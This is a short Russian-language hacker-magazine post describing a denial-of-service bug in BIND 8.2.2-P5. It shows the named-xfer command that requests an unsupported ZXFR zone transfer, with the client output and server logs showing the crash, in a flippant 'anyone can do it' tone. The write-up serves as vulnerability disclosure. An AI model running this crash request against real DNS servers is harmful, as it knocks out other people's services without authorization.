Привет перцы))
Новая дырка в Bind 8.2.2-P5 позволяет уронить практически любой *NIX, суть в следующем: bind безнадежно умирает после запроса с неизвестным типом передачи зоны (ну типа ZXFR).
zone to transfer: zone.pipez.com
dns server: dns.pipez.com 192.168.1.1
me: some.sucker.com 10.10.10.10
Посылаем запрос с ключом «-Z» ,подразумевается ,что мы желаем юзать ZXFR. Но прикол в том, что dns.pipez.com не поддерживает ZXFR и имеет не отконфигуренный «allow-transfer{}» и любой герой может запросить zone.pipez.com.
Пример:
[~/bind/src822p5/bin/named-xfer] $ ./named-xfer -z zone.pipez.com -d 9 -f pics
-Z dns.pipez.com
named-xfer[29297]: send AXFR query 0 to 192.168.1.1
named-xfer[29297]: premature EOF, fetching "zone.pipez.com".
Лог сервера таков:
Nov 8 13:29:09 dns.pipez.com: named[188510]: approved ZXFR from [10.10.10.10].2284 for «zone.pipez.com»
Nov 8 13:29:09 dns.pipez.com: named[188510]: unsupported XFR (type ZXFR) of «zone.pipez.com» (IN) to [10.10.10.10].2284
Все — сервак в глубоком ауте)).

Оставить мнение

Check Also

Жизнь без антивируса. Как побороть малварь голыми руками и обезопасить себя на будущее

На вопрос «Какой антивирус вы используете на своей виндовой машине?» многие безопасники (в…